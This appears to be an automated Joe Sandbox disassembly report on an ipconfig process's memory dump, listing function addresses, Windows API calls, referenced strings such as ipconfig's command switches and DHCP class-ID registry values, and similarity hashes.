Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Free$CacheDataFormatLocalMessageTable__iob_func
String ID:
API String ID: 2186664420-0
Opcode ID: 272f03d9d8414deecbe4b598f1df05f6d4bf8829072b44c4d5c1d958634e888f
Instruction ID: 7ab8cd66e4be3db7c06828ba10601f5500097b559f4130d10ef6380f8fe41079
Opcode Fuzzy Hash: 272f03d9d8414deecbe4b598f1df05f6d4bf8829072b44c4d5c1d958634e888f
Instruction Fuzzy Hash: EE01A5B1604764ABD724AB51CD86B6B73A9EF90B90714C42AB4AE571C0DB71AF40A260

Uniqueness

Uniqueness Score: -1.00%

Function 00C74ACA Relevance: 4.6, APIs: 3, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C74AFB
CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 00C74B10
FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 00C74B23

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f2963788174c0584e4ac8a977f12dca22bebb43a5deee3127d11cdd9e858a395
Instruction ID: 2bee025de761c93f761a37533cd1bec8ca948e56f6117147d34a21b899bc4d20
Opcode Fuzzy Hash: f2963788174c0584e4ac8a977f12dca22bebb43a5deee3127d11cdd9e858a395
Instruction Fuzzy Hash: 2C0116B1A0420EABDF00DFA1CD85ABEB7B9FB04300F904569A52AA2140D770DA44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C726AE Relevance: 1.5, APIs: 1, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00C726B7

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 4ac74debe115eaf38c357930c48406332e1e61f62800a6a96a8d1b5dfdb9d09a
Instruction ID: a9190d8287f2e6bcd30742905e41dec94742305cf6fb2a5e9be7ad924e56f50a
Opcode Fuzzy Hash: 4ac74debe115eaf38c357930c48406332e1e61f62800a6a96a8d1b5dfdb9d09a
Instruction Fuzzy Hash: 36D0A733018229BBCB502F95DC04C8ABBB9EF95331350C326F5AC41061DFB19C50D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C753F0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000053A0), ref: 00C753F5

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6f46b8000865d048fc6dca2ddae77f0e0f6015e5dbb01058795d9a0ac7e28368
Instruction ID: 7e5509e1b668fe5dd7eb413ef21da1cf2c16eeb6c1e6e07d2efd87d2a0ddb678
Opcode Fuzzy Hash: 6f46b8000865d048fc6dca2ddae77f0e0f6015e5dbb01058795d9a0ac7e28368
Instruction Fuzzy Hash: E7900264255604D68B001B706D4960A6A946B4C6527D18560B019C8074DAE550405561

Uniqueness

Uniqueness Score: -1.00%

Function 00C746F8 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 232memorythreadwindowCOMMON

Download Yara Rule

APIs

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00C7470F
setlocale.MSVCRT ref: 00C7471B
SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 00C74724

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74C73: fgetpos.MSVCRT ref: 00C74CA8
Part of subcall function 00C74C73: _fileno.MSVCRT ref: 00C74CC2
Part of subcall function 00C74C73: _setmode.MSVCRT ref: 00C74CCA
Part of subcall function 00C74C73: fwprintf.MSVCRT ref: 00C74CD6

exit.MSVCRT ref: 00C747E5
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00C74807
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C74827

Part of subcall function 00C731D0: DnsResolverOp.DNSAPI(00000002,00000000,00000000), ref: 00C731D9

Strings

debug, xrefs: 00C7479C
setclassid6, xrefs: 00C74794
all, xrefs: 00C74744
allcompartments, xrefs: 00C747A4
renew6, xrefs: 00C747AC
displaydns, xrefs: 00C7476C
registerdns, xrefs: 00C74774
showclassid, xrefs: 00C7477C
flushdns, xrefs: 00C74764
renew, xrefs: 00C74754
release6, xrefs: 00C747B4
setclassid, xrefs: 00C74784
release, xrefs: 00C7475C
showclassid6, xrefs: 00C7478C

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: FormatFreeHeapInformationLanguageLocalMessageResolverThread__iob_func_fileno_setmodeexitfgetposfwprintfsetlocale
String ID: all$allcompartments$debug$displaydns$flushdns$registerdns$release$release6$renew$renew6$setclassid$setclassid6$showclassid$showclassid6
API String ID: 1456437472-1517225019
Opcode ID: 47cc61ca0cd80c9844eca4c251652f0dfc1166b7d499e7e5d8db3908f68802f8
Instruction ID: a1fa24a742fab294cfa3ab6c7b27bb86658d4733c535361c3b95f7cac7f2e8a7
Opcode Fuzzy Hash: 47cc61ca0cd80c9844eca4c251652f0dfc1166b7d499e7e5d8db3908f68802f8
Instruction Fuzzy Hash: 3C819E75508341DB8B19EF21D84692FB7E8EBC0764F24CA1EF9AE57280DB708944EB53

Uniqueness

Uniqueness Score: -1.00%

Function 00C74D35 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00C74D51

Part of subcall function 00C74B41: _fileno.MSVCRT ref: 00C74B4C
Part of subcall function 00C74B41: _get_osfhandle.MSVCRT ref: 00C74B53

_fileno.MSVCRT ref: 00C74D71
_setmode.MSVCRT ref: 00C74D79
wcschr.MSVCRT ref: 00C74D9C
_fileno.MSVCRT ref: 00C74DC2
_setmode.MSVCRT ref: 00C74DCA
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00C74DE8
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00C74DF8
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00C74E16
_fileno.MSVCRT ref: 00C74E23
_write.MSVCRT ref: 00C74E2B
fwprintf.MSVCRT ref: 00C74E3C
fflush.MSVCRT ref: 00C74E46
_fileno.MSVCRT ref: 00C74E4F
_setmode.MSVCRT ref: 00C74E57
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00C74E64

Strings

%ls, xrefs: 00C74E36

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
String ID: %ls
API String ID: 2233937912-3246610740
Opcode ID: fdd7b52301482fd5ff3443c1f285729094796028a85bd9ff2a0e814126a977ad
Instruction ID: c944f40cb5c919efe2796838862b6d4726c01bf06de5b3545cf21fc3209d6f80
Opcode Fuzzy Hash: fdd7b52301482fd5ff3443c1f285729094796028a85bd9ff2a0e814126a977ad
Instruction Fuzzy Hash: EA318271908218FFEB155BA4EC09FAEBB78EB45321F208165F92DE1190DB744A418F14

Uniqueness

Uniqueness Score: -1.00%

Function 00C722FA Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 195registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00C72340
ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C723D3
RtlStringFromGUID.NTDLL(?,?), ref: 00C723EC
memcpy.MSVCRT ref: 00C7241A
RtlFreeUnicodeString.NTDLL(?), ref: 00C7243B

Part of subcall function 00C72260: memset.MSVCRT ref: 00C7228A
Part of subcall function 00C72260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00C722DF

RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,00000001,?,00000000,00000002,?), ref: 00C72491
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00C7249D
memset.MSVCRT ref: 00C724AD
DhcpHandlePnPEvent.DHCPCSVC(00000000,00000001,?,?,00000000), ref: 00C724C9

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

RtlFreeUnicodeString.NTDLL(?), ref: 00C72524

Strings

PIdu, xrefs: 00C72491
DhcpClassId, xrefs: 00C72486
p<Qw, xrefs: 00C7243B, 00C72524

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: FreeStringmemset$Unicode$CloseConvertDhcpEventFormatFromGuidHandleInterfaceLocalLuidMessageOpenValue__iob_funcmemcpy
String ID: DhcpClassId$PIdu$p<Qw
API String ID: 4056406669-2584887344
Opcode ID: 4a83768a526ca62e99a84026d467babdc5adb14057c8b87cf9caac65802fc1cb
Instruction ID: 83813155ff9e24d6ae5546826195561c4cb385e92376de851d62ae71b8cb1375
Opcode Fuzzy Hash: 4a83768a526ca62e99a84026d467babdc5adb14057c8b87cf9caac65802fc1cb
Instruction Fuzzy Hash: D261F572E00208AFDB249BA4CC55FAFB3BDEF88300F0485A9E55ED7251DA709E819B11

Uniqueness

Uniqueness Score: -1.00%

Function 00C72C9B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 184registryCOMMON

Download Yara Rule

APIs

ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00C72D48
RtlStringFromGUID.NTDLL(?,?), ref: 00C72D5E
memcpy.MSVCRT ref: 00C72D83
RtlFreeUnicodeString.NTDLL(?), ref: 00C72DA2

Part of subcall function 00C72C01: memset.MSVCRT ref: 00C72C2B
Part of subcall function 00C72C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00C72BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00C72C80

RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,00000001,?,00000000,00000002,?), ref: 00C72DED
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00C72DF6
Dhcpv6SetUserClass.DHCPCSVC6(?,?,?), ref: 00C72E16

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

RtlFreeUnicodeString.NTDLL(?), ref: 00C72E6F

Strings

PIdu, xrefs: 00C72DED
Dhcpv6ClassId, xrefs: 00C72DE5
p<Qw, xrefs: 00C72DA2, 00C72E6F

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: FreeString$Unicode$ClassCloseConvertDhcpv6FormatFromGuidInterfaceLocalLuidMessageOpenUserValue__iob_funcmemcpymemset
String ID: Dhcpv6ClassId$PIdu$p<Qw
API String ID: 3741014365-1303980570
Opcode ID: 29a6a9d56308165484d7f777dc491125ab3fc3ead5cf459c3a94375d712d09ad
Instruction ID: 373ae005e4d482eb433d53531aefea8d86b975926726e7ceb1932b75a8ebc322
Opcode Fuzzy Hash: 29a6a9d56308165484d7f777dc491125ab3fc3ead5cf459c3a94375d712d09ad
Instruction Fuzzy Hash: 6E513932A006089BDB259FA8DC45BAFB7B9FF84701F24812EF95ED7281DB709941DB40

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02CF293C
___swprintf_l.LIBCMT ref: 02CF295E
___swprintf_l.LIBCMT ref: 02CF29A3
___swprintf_l.LIBCMT ref: 02D2A52E

Strings

ffff:, xrefs: 02D2A504
::ffff:0:%u.%u.%u.%u, xrefs: 02D2A54E
:%u.%u.%u.%u, xrefs: 02D2A5B8
::%hs%u.%u.%u.%u, xrefs: 02D2A527

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9c55fee942633e4257db4d8e76450e42ea282a1f780f3c1fcb94c4cedf5ff993
Instruction ID: 8b2e260609c6a9df2828eedc7a0e5eb1320f595c030b13259331358989508c75
Opcode Fuzzy Hash: 9c55fee942633e4257db4d8e76450e42ea282a1f780f3c1fcb94c4cedf5ff993
Instruction Fuzzy Hash: 5F51F5B2A00156BFDB90DBA88890A7FF7B8FF48305B508169E9A5D7641D334DF04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02D624A6
___swprintf_l.LIBCMT ref: 02D624E2
___swprintf_l.LIBCMT ref: 02D6257D
___swprintf_l.LIBCMT ref: 02D625A3
___swprintf_l.LIBCMT ref: 02D625C8
___swprintf_l.LIBCMT ref: 02D62608

Strings

::%hs%u.%u.%u.%u, xrefs: 02D6249E
ffff:, xrefs: 02D6247D, 02D6249D
:%u.%u.%u.%u, xrefs: 02D625FF
::ffff:0:%u.%u.%u.%u, xrefs: 02D624DA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 54cf722920081087a9bf8cc9caad093cc4d652912987ff467a3cf112ce251450
Instruction ID: 551c51bfc1de704b8a73ed41fb664871324754d2334ff85f0ff056c7809cb114
Opcode Fuzzy Hash: 54cf722920081087a9bf8cc9caad093cc4d652912987ff467a3cf112ce251450
Instruction Fuzzy Hash: CC51B675A00645ABDB30DE5CC8A8A7FBBF9EB44304B44846AE8D6D7781D774EE40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C74BBC Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00C74BE2
_wcsicmp.MSVCRT ref: 00C74C03
_wcsicmp.MSVCRT ref: 00C74C1E

Strings

OutputEncoding, xrefs: 00C74BDD
UTF-8, xrefs: 00C74C4C
Unicode, xrefs: 00C74BFD
Ansi, xrefs: 00C74C18
UTF8, xrefs: 00C74C34

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: _wcsicmp$EnvironmentVariable
String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
API String ID: 198002717-1479523454
Opcode ID: 7d3a11b9298661883ed5fd25e88cfee05d65ee4df4784ee060028bcd1e03f701
Instruction ID: 5724ed4fc693669651af2b2f6a4757d9c1a6833424b5f10773f893d9b8003a59
Opcode Fuzzy Hash: 7d3a11b9298661883ed5fd25e88cfee05d65ee4df4784ee060028bcd1e03f701
Instruction Fuzzy Hash: 6B112C3560430AEFDF28DB25DC15BAD7BE8EF44321F608469F64DD6080EBB0DA408B15

Uniqueness

Uniqueness Score: -1.00%

Function 00C7419B Relevance: 16.7, APIs: 11, Instructions: 165memorynetworkCOMMON

Download Yara Rule

APIs

GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000001,?,?), ref: 00C741CF
GetComputerNameExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000002,?,?), ref: 00C74212
GetNetworkParams.IPHLPAPI(00000000,?), ref: 00C74249
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00C74260
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C74267
GetNetworkParams.IPHLPAPI(00000000,?), ref: 00C7427F
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00C742FE
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C74305
DnsQueryConfigAllocEx.DNSAPI(00010003,00000000,00000000), ref: 00C74312
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00C7433D
DnsFreeConfigStructure.DNSAPI(00000000,00010003), ref: 00C74381

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Heap$AllocComputerConfigFreeNameNetworkParamsProcess$ByteCharMultiQueryStructureWide
String ID:
API String ID: 3728844974-0
Opcode ID: 5bbc45da40b8e849233d22c815ddf9cf71972f29c246852cc1cfadf79431e8a3
Instruction ID: c23ea6c54b84ca566a15b3c24364d71f55516258c3b93c5858563019c1adf264
Opcode Fuzzy Hash: 5bbc45da40b8e849233d22c815ddf9cf71972f29c246852cc1cfadf79431e8a3
Instruction Fuzzy Hash: F351B371904319AFE7296B60DC8DFAF777CEB44710F1081A9F51D96092DB709E809A21

Uniqueness

Uniqueness Score: -1.00%

Function 02CE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D24742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D246FC
Execute=1, xrefs: 02D24713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D24725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D24655
ExecuteOptions, xrefs: 02D246A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 02D24787

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: bb2a440cd211c8e6b2aa98606caa63a18e76ef5a44e1831f0458ec0a79602d59
Instruction ID: 0f87bdfc6db10748f882499049904cb21e76aff4c3bcbc58cb6cd839fd6c0b12
Opcode Fuzzy Hash: bb2a440cd211c8e6b2aa98606caa63a18e76ef5a44e1831f0458ec0a79602d59
Instruction Fuzzy Hash: 3D510B71A00219AAEF11EBA4DC5AFAAB7BDEF54708F1400A9D506AB290D7709E49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C729AC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149memoryCOMMON

Download Yara Rule

APIs

ConvertInterfaceLuidToNameW.IPHLPAPI(?,?,00000020), ref: 00C729FD
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000400), ref: 00C72A16
Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00C72A38
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00C72A49
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?), ref: 00C72A54
Dhcpv6GetUserClasses.DHCPCSVC6(00000000,?,?,00000000), ref: 00C72A6E
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00C72AEA

Strings

pFYo, xrefs: 00C72A38, 00C72A6E

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Local$AllocClassesDhcpv6FreeUser$ConvertInterfaceLuidName
String ID: pFYo
API String ID: 1150267431-2283279398
Opcode ID: ad14449981e85e05150c90981634ee3cafdd65f51602e32fc1a8c9dfefe05def
Instruction ID: f41114d9cfceebf21df958f2a9aca01665faa44810a8ebbf64f01f1950af8ebd
Opcode Fuzzy Hash: ad14449981e85e05150c90981634ee3cafdd65f51602e32fc1a8c9dfefe05def
Instruction Fuzzy Hash: 46415272E00309AFDB159FE4DC85B9EB7B8FF48710F148126F919AB281DBB09D459B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C74C73 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00C74B41: _fileno.MSVCRT ref: 00C74B4C
Part of subcall function 00C74B41: _get_osfhandle.MSVCRT ref: 00C74B53

Part of subcall function 00C74BBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,?), ref: 00C74BE2
Part of subcall function 00C74BBC: _wcsicmp.MSVCRT ref: 00C74C03

fgetpos.MSVCRT ref: 00C74CA8
_fileno.MSVCRT ref: 00C74CC2
_setmode.MSVCRT ref: 00C74CCA
fwprintf.MSVCRT ref: 00C74CD6
fgetpos.MSVCRT ref: 00C74CEF
_fileno.MSVCRT ref: 00C74D09
_setmode.MSVCRT ref: 00C74D11
_fileno.MSVCRT ref: 00C74D21
_write.MSVCRT ref: 00C74D29

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
String ID:
API String ID: 2328354365-0
Opcode ID: 7aa34cba251d806cb936380711b0621028296b697a6459712d3d66f3752a1d4e
Instruction ID: 990c30c4dbce236c422c4cf242d7872034b102937be1a5d178c57e120c588a69
Opcode Fuzzy Hash: 7aa34cba251d806cb936380711b0621028296b697a6459712d3d66f3752a1d4e
Instruction Fuzzy Hash: AA116331D45208EFEB289B64EC0ABDD77A9FF11314B508455F65DD2080FB70AB41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00C74F63 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00C757D0,0000000C), ref: 00C74FA0
_amsg_exit.MSVCRT ref: 00C74FB5
_initterm.MSVCRT ref: 00C75009
__IsNonwritableInCurrentImage.LIBCMT ref: 00C75035
exit.MSVCRT ref: 00C7507C
_XcptFilter.MSVCRT ref: 00C7508E

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
String ID:
API String ID: 796493780-0
Opcode ID: 62d5b6d5108036f0866ac3775859fd99ce6fb3f379041f53a2490ef1615a62cb
Instruction ID: 8d83c0ebedc89e69c5199527864e51bdac19435470d43a6c576113c52810efef
Opcode Fuzzy Hash: 62d5b6d5108036f0866ac3775859fd99ce6fb3f379041f53a2490ef1615a62cb
Instruction Fuzzy Hash: 49319E71A04B11DFDB259F69EC4576D77A0FB08720F108129F51D976B0DBB08980DB94

Uniqueness

Uniqueness Score: -1.00%

